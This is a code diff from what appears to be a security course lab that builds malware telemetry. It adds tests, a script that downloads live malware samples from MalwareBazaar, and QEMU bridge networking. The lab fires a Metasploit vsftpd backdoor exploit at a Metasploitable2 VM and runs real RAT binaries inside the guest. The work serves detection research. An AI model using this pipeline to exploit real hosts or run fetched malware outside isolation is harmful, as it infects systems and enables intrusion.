row = perf_qemu._build_row(t_mono_origin_ns=0, interval_s=0.1, agg=agg)
|
||||||
|
assert row["cycles"] == 100
|
||||||
|
assert row["cache_misses"] is None
|
||||||
|
assert row["cache_miss_rate"] is None
|
||||||
|
assert pytest.approx(row["ipc"], abs=1e-9) == 0.5
|
||||||
|
|
||||||
|
|
||||||
|
def test_run_loop_returns_zero_when_perf_missing(tmp_path: Path, monkeypatch) -> None:
|
||||||
|
monkeypatch.setattr(perf_qemu, "perf_available", lambda: False)
|
||||||
|
import threading
|
||||||
|
rows = perf_qemu.run_loop(
|
||||||
|
pid=1,
|
||||||
|
output_path=tmp_path / "telemetry-perf.jsonl",
|
||||||
|
t_mono_origin_ns=0,
|
||||||
|
interval_ms=100,
|
||||||
|
stop_event=threading.Event(),
|
||||||
|
)
|
||||||
|
assert rows == 0
|
||||||
168
tests/test_tier4.py
Normal file
168
tests/test_tier4.py
Normal file
|
|
@ -0,0 +1,168 @@
|
||||||
|
"""Tests for the Tier-4 path:
|
||||||
|
- real_binary_workload constructs valid shell commands
|
||||||
|
- Sample.binary_path resolves correctly
|
||||||
|
- MSFExploitDriver.real-sample dispatch picks the upload+exec path
|
||||||
|
when a binary is staged, mimic when it isn't
|
||||||
|
- tools/fetch_sample input validation (we don't hit the live API)
|
||||||
|
"""
|
||||||
|
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import hashlib
|
||||||
|
from pathlib import Path
|
||||||
|
|
||||||
|
import pytest
|
||||||
|
|
||||||
|
from exploits.driver import DriverConfig, MSFExploitDriver
|
||||||
|
from exploits.modules import load_module_config
|
||||||
|
from exploits.workloads import real_binary_workload
|
||||||
|
from samples.manifest import Sample
|
||||||
|
|
||||||
|
|
||||||
|
REPO_ROOT = Path(__file__).resolve().parent.parent
|
||||||
|
MODULES_DIR = REPO_ROOT / "exploits" / "modules"
|
||||||
|
|
||||||
|
|
||||||
|
# Reuse the FakeMSFRpcClient from test_exploits.py.
|
||||||
|
from tests.test_exploits import FakeMSFRpcClient # noqa: E402
|
||||||
|
|
||||||
|
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
# real_binary_workload
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
def test_real_binary_workload_embeds_base64() -> None:
|
||||||
|
payload = b"\x7fELF" + b"\x00" * 64 # tiny ELF-shaped header
|
||||||
|
w = real_binary_workload(payload)
|
||||||
|
# Start command must contain a base64 chunk that decodes back to
|
||||||
|
# our bytes.
|
||||||
|
assert "CIS490_B64_EOF" in w.start_cmd
|
||||||
|
# Find the base64 block.
|
||||||
|
import base64 as _b64
|
||||||
|
body = w.start_cmd.split("CIS490_B64_EOF", 1)[1]
|
||||||
|
body = body.split("CIS490_B64_EOF", 1)[0]
|
||||||
|
decoded = _b64.b64decode("".join(body.split()))
|
||||||
|
assert decoded == payload
|
||||||
|
|
||||||
|
|
||||||
|
def test_real_binary_workload_stop_kills_pidfile() -> None:
|
||||||
|
w = real_binary_workload(b"x" * 16)
|
||||||
|
assert "kill" in w.stop_cmd
|
||||||
|
assert ".cis490-real" in w.stop_cmd
|
||||||
|
|
||||||
|
|
||||||
|
def test_real_binary_workload_per_profile_isolation() -> None:
|
||||||
|
a = real_binary_workload(b"\x00", sample=Sample(name="a", family="A", category="rat", profile="cpu-saturate"))
|
||||||
|
b = real_binary_workload(b"\x00", sample=Sample(name="b", family="B", category="rat", profile="bursty-c2"))
|
||||||
|
# Different profiles → different /tmp paths so concurrent samples
|
||||||
|
# don't stomp each other in the same guest.
|
||||||
|
assert a.profile != b.profile
|
||||||
|
assert a.start_cmd != b.start_cmd
|
||||||
|
|
||||||
|
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
# Sample.binary_path
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
def test_binary_path_resolves_when_staged(tmp_path: Path) -> None:
|
||||||
|
sha = "a" * 64
|
||||||
|
(tmp_path / sha).write_bytes(b"hello")
|
||||||
|
s = Sample(name="x", family="X", category="rat", profile="cpu-saturate", sha256=sha)
|
||||||
|
assert s.binary_path(tmp_path) == tmp_path / sha
|
||||||
|
|
||||||
|
|
||||||
|
def test_binary_path_none_when_missing(tmp_path: Path) -> None:
|
||||||
|
s = Sample(name="x", family="X", category="rat", profile="cpu-saturate", sha256="b" * 64)
|
||||||
|
assert s.binary_path(tmp_path) is None
|
||||||
|
|
||||||
|
|
||||||
|
def test_binary_path_none_for_mimic_sample(tmp_path: Path) -> None:
|
||||||
|
s = Sample(name="x", family="X", category="rat", profile="cpu-saturate")
|
||||||
|
assert s.binary_path(tmp_path) is None
|
||||||
|
|
||||||
|
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
# Driver dispatch
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
def test_driver_picks_real_binary_when_staged(tmp_path: Path) -> None:
|
||||||
|
payload = b"\x7fELF\x02" + b"\x00" * 60
|
||||||
|
sha = hashlib.sha256(payload).hexdigest()
|
||||||
|
(tmp_path / sha).write_bytes(payload)
|
||||||
|
|
||||||
|
sample = Sample(
|
||||||
|
name="real-x", family="X", category="rat",
|
||||||
|
profile="cpu-saturate", sha256=sha,
|
||||||
|
)
|
||||||
|
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
|
||||||
|
client = FakeMSFRpcClient(sessions_after_fire={1: {"type": "shell"}})
|
||||||
|
driver = MSFExploitDriver(
|
||||||
|
client=client, # type: ignore[arg-type]
|
||||||
|
module=cfg,
|
||||||
|
cfg=DriverConfig(
|
||||||
|
target_ip="10.200.0.10",
|
||||||
|
session_open_timeout_s=0.5,
|
||||||
|
sample_store_root=tmp_path,
|
||||||
|
),
|
||||||
|
emit_event=lambda *a, **kw: None,
|
||||||
|
sample=sample,
|
||||||
|
)
|
||||||
|
assert driver.workload is not None
|
||||||
|
# The workload's profile name encodes "real:..."
|
||||||
|
assert driver.workload.profile.startswith("real:")
|
||||||
|
# Start cmd contains the b64 of our payload.
|
||||||
|
import base64 as _b64
|
||||||
|
assert _b64.b64encode(payload).decode("ascii")[:32] in driver.workload.start_cmd
|
||||||
|
|
||||||
|
|
||||||
|
def test_driver_falls_back_to_mimic_when_real_binary_missing(tmp_path: Path) -> None:
|
||||||
|
sample = Sample(
|
||||||
|
name="real-but-missing", family="X", category="rat",
|
||||||
|
profile="bursty-c2", sha256="c" * 64,
|
||||||
|
)
|
||||||
|
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
|
||||||
|
client = FakeMSFRpcClient(sessions_after_fire={1: {"type": "shell"}})
|
||||||
|
driver = MSFExploitDriver(
|
||||||
|
client=client, # type: ignore[arg-type]
|
||||||
|
module=cfg,
|
||||||
|
cfg=DriverConfig(
|
||||||
|
target_ip="10.200.0.10",
|
||||||
|
session_open_timeout_s=0.5,
|
||||||
|
sample_store_root=tmp_path, # empty
|
||||||
|
),
|
||||||
|
emit_event=lambda *a, **kw: None,
|
||||||
|
sample=sample,
|
||||||
|
)
|
||||||
|
# Mimic workload selected because the binary isn't staged.
|
||||||
|
assert driver.workload is not None
|
||||||
|
assert driver.workload.profile == "bursty-c2"
|
||||||
|
assert "real:" not in driver.workload.profile
|
||||||
|
|
||||||
|
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
# Fetcher input validation
|
||||||
|
# ---------------------------------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
def test_fetch_sample_rejects_bad_sha(tmp_path: Path) -> None:
|
||||||
|
from tools.fetch_sample import fetch_sample
|
||||||
|
|
||||||
|
with pytest.raises(ValueError, match="64 hex chars"):
|
||||||
|
fetch_sample("not-a-hash", tmp_path, api_key="x")
|
||||||
|
|
||||||
|
|
||||||
|
def test_fetch_sample_returns_existing_when_hash_matches(tmp_path: Path) -> None:
|
||||||
|
from tools.fetch_sample import fetch_sample
|
||||||
|
|
||||||
|
payload = b"already staged bytes"
|
||||||
|
sha = hashlib.sha256(payload).hexdigest()
|
||||||
|
p = tmp_path / sha
|
||||||
|
p.write_bytes(payload)
|
||||||
|
# api_key is unused on the cached path; pass anything.
|
||||||
|
out = fetch_sample(sha, tmp_path, api_key="ignored")
|
||||||
|
assert out == p
|
||||||
|
# File untouched.
|
||||||
|
assert p.read_bytes() == payload
|
||||||
142
tools/fetch_sample.py
Normal file
142
tools/fetch_sample.py
Normal file
|
|
@ -0,0 +1,142 @@
|
||||||
|
"""Fetch a malware sample by sha256 from MalwareBazaar.
|
||||||
|
|
||||||
|
Lands the binary at ``samples/store/<sha256>`` (gitignored), verifies
|
||||||
|
the hash on the way in, and prints the resulting path on stdout.
|
||||||
|
|
||||||
|
Usage:
|
||||||
|
|
||||||
|
MALWAREBAZAAR_API_KEY=... uv run python tools/fetch_sample.py <sha256>
|
||||||
|
|
||||||
|
MalwareBazaar requires a free API key as of late 2023; sign up at
|
||||||
|
https://bazaar.abuse.ch and either pass via env or place in
|
||||||
|
``samples/.bazaar.token`` (mode 0600, gitignored). The downloaded
|
||||||
|
zip is unencrypted by ``infected`` per the MB convention.
|
||||||
|
|
||||||
|
The fetcher is intentionally read-only over the network — no upload,
|
||||||
|
no metadata posted — so a lab host with a tightly-egress-firewalled
|
||||||
|
WG mesh can run it once on a build host and rsync the resulting
|
||||||
|
``samples/store/`` directory across the fleet.
|
||||||
|
"""
|
||||||
|
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import argparse
|
||||||
|
import hashlib
|
||||||
|
import os
|
||||||
|
import sys
|
||||||
|
import urllib.parse
|
||||||
|
import urllib.request
|
||||||
|
import zipfile
|
||||||
|
from pathlib import Path
|
||||||
|
|
||||||
|
|
||||||
|
MB_ENDPOINT = "https://mb-api.abuse.ch/api/v1/"
|
||||||
|
MB_ZIP_PASSWORD = b"infected"
|
||||||
|
|
||||||
|
|
||||||
|
def _read_api_key(repo_root: Path) -> str | None:
|
||||||
|
env = os.environ.get("MALWAREBAZAAR_API_KEY")
|
||||||
|
if env:
|
||||||
|
return env.strip()
|
||||||
|
token = repo_root / "samples" / ".bazaar.token"
|
||||||
|
if token.exists():
|
||||||
|
return token.read_text().strip()
|
||||||
|
return None
|
||||||
|
|
||||||
|
|
||||||
|
def fetch_sample(
|
||||||
|
sha256: str,
|
||||||
|
out_dir: Path,
|
||||||
|
api_key: str,
|
||||||
|
*,
|
||||||
|
timeout_s: float = 60.0,
|
||||||
|
) -> Path:
|
||||||
|
if len(sha256) != 64 or not all(c in "0123456789abcdef" for c in sha256.lower()):
|
||||||
|
raise ValueError(f"sha256 must be 64 hex chars, got {sha256!r}")
|
||||||
|
sha256 = sha256.lower()
|
||||||
|
out_dir.mkdir(parents=True, exist_ok=True)
|
||||||
|
|
||||||
|
target = out_dir / sha256
|
||||||
|
if target.exists():
|
||||||
|
actual = hashlib.sha256(target.read_bytes()).hexdigest()
|
||||||
|
if actual == sha256:
|
||||||
|
return target
|
||||||
|
target.unlink() # tampered or partial; refetch.
|
||||||
|
|
||||||
|
body = urllib.parse.urlencode({
|
||||||
|
"query": "get_file",
|
||||||
|
"sha256_hash": sha256,
|
||||||
|
}).encode("utf-8")
|
||||||
|
req = urllib.request.Request(
|
||||||
|
MB_ENDPOINT,
|
||||||
|
data=body,
|
||||||
|
headers={
|
||||||
|
"Auth-Key": api_key,
|
||||||
|
"User-Agent": "cis490-fetcher/0",
|
||||||
|
},
|
||||||
|
method="POST",
|
||||||
|
)
|
||||||
|
with urllib.request.urlopen(req, timeout=timeout_s) as r:
|
||||||
|
payload = r.read()
|
||||||
|
|
||||||
|
if not payload.startswith(b"PK"):
|
||||||
|
raise RuntimeError(
|
||||||
|
f"MalwareBazaar returned non-zip response (first 200 bytes): "
|
||||||
|
f"{payload[:200]!r}"
|
||||||
|
)
|
||||||
|
|
||||||
|
zip_path = out_dir / f"{sha256}.zip"
|
||||||
|
zip_path.write_bytes(payload)
|
||||||
|
try:
|
||||||
|
with zipfile.ZipFile(zip_path) as zf:
|
||||||
|
zf.setpassword(MB_ZIP_PASSWORD)
|
||||||
|
names = zf.namelist()
|
||||||
|
if not names:
|
||||||
|
raise RuntimeError(f"{sha256}: empty zip")
|
||||||
|
with zf.open(names[0]) as src, target.open("wb") as dst:
|
||||||
|
dst.write(src.read())
|
||||||
|
finally:
|
||||||
|
zip_path.unlink(missing_ok=True)
|
||||||
|
|
||||||
|
actual = hashlib.sha256(target.read_bytes()).hexdigest()
|
||||||
|
if actual != sha256:
|
||||||
|
target.unlink()
|
||||||
|
raise RuntimeError(f"sha256 mismatch: expected {sha256}, got {actual}")
|
||||||
|
return target
|
||||||
|
|
||||||
|
|
||||||
|
def main(argv: list[str] | None = None) -> int:
|
||||||
|
p = argparse.ArgumentParser(prog="fetch_sample")
|
||||||
|
p.add_argument("sha256")
|
||||||
|
p.add_argument(
|
||||||
|
"--out-dir",
|
||||||
|
type=Path,
|
||||||
|
default=None,
|
||||||
|
help="Where to drop <sha256> (default: samples/store/ relative to repo)",
|
||||||
|
)
|
||||||
|
args = p.parse_args(argv)
|
||||||
|
|
||||||
|
repo_root = Path(__file__).resolve().parent.parent
|
||||||
|
out_dir = args.out_dir or (repo_root / "samples" / "store")
|
||||||
|
|
||||||
|
api_key = _read_api_key(repo_root)
|
||||||
|
if not api_key:
|
||||||
|
print(
|
||||||
|
"no MalwareBazaar API key — set MALWAREBAZAAR_API_KEY or write "
|
||||||
|
"samples/.bazaar.token (mode 0600). Register at "
|
||||||
|
"https://bazaar.abuse.ch.",
|
||||||
|
file=sys.stderr,
|
||||||
|
)
|
||||||
|
return 2
|
||||||
|
|
||||||
|
try:
|
||||||
|
path = fetch_sample(args.sha256, out_dir, api_key)
|
||||||
|
except Exception as e:
|
||||||
|
print(f"fetch failed: {e}", file=sys.stderr)
|
||||||
|
return 1
|
||||||
|
print(path)
|
||||||
|
return 0
|
||||||
|
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
sys.exit(main())
|
||||||
|
|
@ -174,6 +174,7 @@ def main() -> int:
|
||||||
snapshot_name="baseline-v1",
|
snapshot_name="baseline-v1",
|
||||||
qmp_socket=qmp_sock if qmp_sock.exists() else None,
|
qmp_socket=qmp_sock if qmp_sock.exists() else None,
|
||||||
guest_agent_socket=agent_sock if agent_sock.exists() else None,
|
guest_agent_socket=agent_sock if agent_sock.exists() else None,
|
||||||
|
bridge_iface=os.environ.get("BRIDGE") or None,
|
||||||
)
|
)
|
||||||
|
|
||||||
result = EpisodeRunner(cfg, on_phase=controller.set_phase).run()
|
result = EpisodeRunner(cfg, on_phase=controller.set_phase).run()
|
||||||
|
|
|
||||||
|
|
@ -224,7 +224,10 @@ def main() -> int:
|
||||||
driver = MSFExploitDriver(
|
driver = MSFExploitDriver(
|
||||||
client=client,
|
client=client,
|
||||||
module=module,
|
module=module,
|
||||||
cfg=DriverConfig(target_ip=args.target_ip),
|
cfg=DriverConfig(
|
||||||
|
target_ip=args.target_ip,
|
||||||
|
sample_store_root=repo_root / "samples" / "store",
|
||||||
|
),
|
||||||
emit_event=runner.emit_event,
|
emit_event=runner.emit_event,
|
||||||
sample=sample,
|
sample=sample,
|
||||||
)
|
)
|
||||||
|
|
|
||||||
|
|
@ -22,6 +22,11 @@ CIDATA="${CIDATA:-$REPO_ROOT/vm/images/cidata.iso}"
|
||||||
SLOT="${SLOT:-0}"
|
SLOT="${SLOT:-0}"
|
||||||
RUN_DIR="${RUN_DIR:-/tmp/cis490-vm-$SLOT}"
|
RUN_DIR="${RUN_DIR:-/tmp/cis490-vm-$SLOT}"
|
||||||
SSH_PORT="${SSH_PORT:-$((2222 + SLOT))}"
|
SSH_PORT="${SSH_PORT:-$((2222 + SLOT))}"
|
||||||
|
# When BRIDGE is set, attach a tap to the host-only bridge instead of
|
||||||
|
# using SLIRP usermode networking. The tap must already exist and be a
|
||||||
|
# member of the bridge — see vm/setup_bridge.sh + (operator) ip tuntap.
|
||||||
|
BRIDGE="${BRIDGE:-}"
|
||||||
|
TAP="${TAP:-cis490tap$SLOT}"
|
||||||
|
|
||||||
mkdir -p "$RUN_DIR"
|
mkdir -p "$RUN_DIR"
|
||||||
QMP_SOCK="$RUN_DIR/qmp.sock"
|
QMP_SOCK="$RUN_DIR/qmp.sock"
|
||||||
|
|
@ -53,7 +58,11 @@ exec qemu-system-x86_64 \
|
||||||
-m 256 \
|
-m 256 \
|
||||||
-drive file="$IMAGE",format=qcow2,if=virtio,snapshot=on \
|
-drive file="$IMAGE",format=qcow2,if=virtio,snapshot=on \
|
||||||
-drive file="$CIDATA",format=raw,if=virtio,readonly=on \
|
-drive file="$CIDATA",format=raw,if=virtio,readonly=on \
|
||||||
-netdev user,id=n0,hostfwd=tcp:127.0.0.1:"$SSH_PORT"-:22 \
|
$(if [[ -n "$BRIDGE" ]]; then \
|
||||||
|
echo -n "-netdev tap,id=n0,ifname=$TAP,script=no,downscript=no "; \
|
||||||
|
else \
|
||||||
|
echo -n "-netdev user,id=n0,hostfwd=tcp:127.0.0.1:$SSH_PORT-:22 "; \
|
||||||
|
fi) \
|
||||||
-device virtio-net-pci,netdev=n0 \
|
-device virtio-net-pci,netdev=n0 \
|
||||||
-device virtio-serial-pci,id=cis490vs0 \
|
-device virtio-serial-pci,id=cis490vs0 \
|
||||||
-chardev socket,id=cis490agent,path="$AGENT_SOCK",server=on,wait=off \
|
-chardev socket,id=cis490agent,path="$AGENT_SOCK",server=on,wait=off \
|
||||||
|
|
|
||||||
|
|
@ -29,6 +29,10 @@ IMAGE="${IMAGE:-$REPO_ROOT/vm/images/metasploitable2.qcow2}"
|
||||||
SLOT="${SLOT:-0}"
|
SLOT="${SLOT:-0}"
|
||||||
RUN_DIR="${RUN_DIR:-/tmp/cis490-target-$SLOT}"
|
RUN_DIR="${RUN_DIR:-/tmp/cis490-target-$SLOT}"
|
||||||
RAM_MIB="${RAM_MIB:-512}"
|
RAM_MIB="${RAM_MIB:-512}"
|
||||||
|
# When BRIDGE is set, attach a tap to the host-only bridge instead of
|
||||||
|
# using SLIRP. Pcap-feature episodes (source 4) require this.
|
||||||
|
BRIDGE="${BRIDGE:-}"
|
||||||
|
TAP="${TAP:-cis490target$SLOT}"
|
||||||
# Ports the host should forward to the guest. Comma-separated host:guest pairs.
|
# Ports the host should forward to the guest. Comma-separated host:guest pairs.
|
||||||
# Default covers the vsftpd module's RPORT. Slot offset makes per-VM
|
# Default covers the vsftpd module's RPORT. Slot offset makes per-VM
|
||||||
# fleet runs collision-free (slot 0 → 21, slot 1 → 121, slot 2 → 221, ...).
|
# fleet runs collision-free (slot 0 → 21, slot 1 → 121, slot 2 → 221, ...).
|
||||||
|
|
@ -56,14 +60,20 @@ EOF
|
||||||
exit 1
|
exit 1
|
||||||
fi
|
fi
|
||||||
|
|
||||||
# Build the netdev string with one hostfwd= per requested port pair.
|
# Build the netdev string. With BRIDGE set we use a tap on the host-only
|
||||||
NETDEV="user,id=n0,restrict=on"
|
# bridge (so source-4 pcap captures the traffic). Without it, SLIRP
|
||||||
IFS=',' read -ra _PAIRS <<< "$TARGET_PORTS"
|
# usermode + restrict=on for the no-egress smoke runs.
|
||||||
for pair in "${_PAIRS[@]}"; do
|
if [[ -n "$BRIDGE" ]]; then
|
||||||
host_port="${pair%%:*}"
|
NETDEV="tap,id=n0,ifname=$TAP,script=no,downscript=no"
|
||||||
guest_port="${pair##*:}"
|
else
|
||||||
NETDEV+=",hostfwd=tcp:127.0.0.1:${host_port}-:${guest_port}"
|
NETDEV="user,id=n0,restrict=on"
|
||||||
done
|
IFS=',' read -ra _PAIRS <<< "$TARGET_PORTS"
|
||||||
|
for pair in "${_PAIRS[@]}"; do
|
||||||
|
host_port="${pair%%:*}"
|
||||||
|
guest_port="${pair##*:}"
|
||||||
|
NETDEV+=",hostfwd=tcp:127.0.0.1:${host_port}-:${guest_port}"
|
||||||
|
done
|
||||||
|
fi
|
||||||
|
|
||||||
# Pick acceleration: explicit override wins; otherwise use KVM if the
|
# Pick acceleration: explicit override wins; otherwise use KVM if the
|
||||||
# device is present, else TCG.
|
# device is present, else TCG.
|
||||||
|
|
|
||||||
Loading…
Add table
Reference in a new issue